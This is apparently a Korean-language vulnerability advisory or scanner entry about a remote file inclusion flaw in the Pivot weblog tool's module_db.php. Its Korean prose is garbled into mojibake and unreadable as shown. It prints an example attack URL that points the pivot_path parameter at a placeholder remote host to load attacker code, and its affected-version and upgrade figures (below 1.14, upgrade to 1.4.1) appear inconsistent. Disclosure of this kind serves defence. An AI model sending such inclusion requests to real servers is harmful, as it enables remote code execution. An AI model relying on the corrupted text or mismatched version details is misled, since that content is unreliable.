English
¢¸¢· µÚ·Î
Ãë¾àÁ¡ID 21311
À§Çèµµ 40
Æ÷Æ® 80, ...
ÇÁ·ÎÅäÄÝ TCP
ºÐ·ù CGI
»ó¼¼¼³¸í ÇØ´ç Pivot ¼ÒÇÁÆ®¿þ¾î´Â 'module_db.php' ÆÄÀÏ¿¡ ¿ø°ÝÁö ÆÄÀÏ Æ÷ÇÔ Ãë¾àÁ¡À» °¡Áö°í ÀÖ´Ù.
PivotÀº µ¥ÀÌÅͺ£À̽º°¡ ºÒÇÊ¿äÇÑ À¥ ·Î±×(Weblog) »ý¼º ¾ÖÇø®ÄÉÀ̼ÇÀÌ´Ù. ÀϺΠPivot ¹öÀü¿¡´Â ÆÄÀÏ Æ÷ÇÔ ÇÔ¼ö È£Ãâ¿¡ ÆÄ¶ó¹ÌÅͷμ­ »ç¿ëÀÚ ÀÔ·ÂÀ» ³Ñ±â±â Àü¿¡, »ç¿ëÀÚ ÀԷ¿¡ ´ëÇÑ ÀûÀýÇÑ ÇÊÅ͸µÀ» ÇÏÁö ¾Ê´Â °áÇÔÀ¸·Î ÀÎÇÏ¿© ¿ø°ÝÁö °ø°ÝÀÚ°¡ ¿øÇÏ´Â ÀÓÀÇÀÇ ÆÄÀÏÀ̳ª php Äڵ带 Æ÷ÇÔ½Ãų ¼ö ÀÖ´Â Ãë¾àÁ¡ÀÌ Á¸ÀçÇÑ´Ù. ¿ø°ÝÁö °ø°ÝÀÚµéÀº ´ÙÀ½°ú °°ÀÌ ´Ù¸¥ ¿ø°ÝÁö ½Ã½ºÅÛ »óÀÇ ¾ÇÀÇÀûÀÎ ÆÄÀÏÀ» ¸í½ÃÇϱâ À§ÇØ ÆÄ¶ó¹ÌÅͷμ­ path º¯¼ö¸¦ »ç¿ëÇÏ¿© module_db.php ÆÄÀÏ¿¡ Àß Á¶ÀÛµÈ URL ¿äûÀ» Àü´ÞÇÏ´Â ¹æ¹ýÀ¸·Î ·ÎÄà ½Ã½ºÅÛÀÇ ±ÇÇÑÀ» °¡Áö°í ½Ã½ºÅÛ »ó¿¡¼­ ÀÓÀÇÀÇ Äڵ带 ½ÇÇàÇÒ ¼ö ÀÖ´Ù.

http://[target_server]/pivot/modules/module_db.php?pivot_path=http://xxxxxxxxxx/

* Âü°í »çÀÌÆ®:
http://archives.neohapsis.com/archives/fulldisclosure/2004-06/0398.html

* ¿µÇâÀ» ¹Þ´Â Ç÷§Æû:
Pivot Web Log Tool 1.14 ¹Ì¸¸ ¹öÀüµé
¸ðµç ¿î¿µÃ¼Á¦ ¸ðµç ¹öÀü
ÇØ°áÃ¥ ´ÙÀ½ÀÇ Pivot À¥ »çÀÌÆ®¸¦ ÂüÁ¶ÇÏ¿© PivotÀÇ °¡Àå ÃֽйöÀü(1.4.1 ȤÀº ÀÌÈÄ)À» ±¸ÇÏ¿© ¾÷±×·¹À̵åÇÏ¿©¾ß ÇÑ´Ù:
https://sourceforge.net/project/showfiles.php?group_id=67653&package_id=65955&release_id=245757

Àӽà Á¶Ä¡¹æ¹ýÀ¸·Î, ´ÙÀ½ÀÇ Full-Disclosure ¸ÞÀϸµ ¸®½ºÆ®¿¡ 2004³â 6¿ù 14ÀÏ(¿ù¿äÀÏ) 15:59:58 CDT ¿¡ °Ô½ÃµÈ ³»¿ëÀ» ÂüÁ¶ÇÏ¿© ºñ°ø½ÄÀûÀÎ ÆÐÄ¡¸¦ Àû¿ëÇÒ ¼ö ÀÖ´Ù: http://archives.neohapsis.com/archives/fulldisclosure/2004-06/0398.html
°ü·Ã URL (CVE)
°ü·Ã URL 10553 (SecurityFocus)
°ü·Ã URL 16418 (ISS)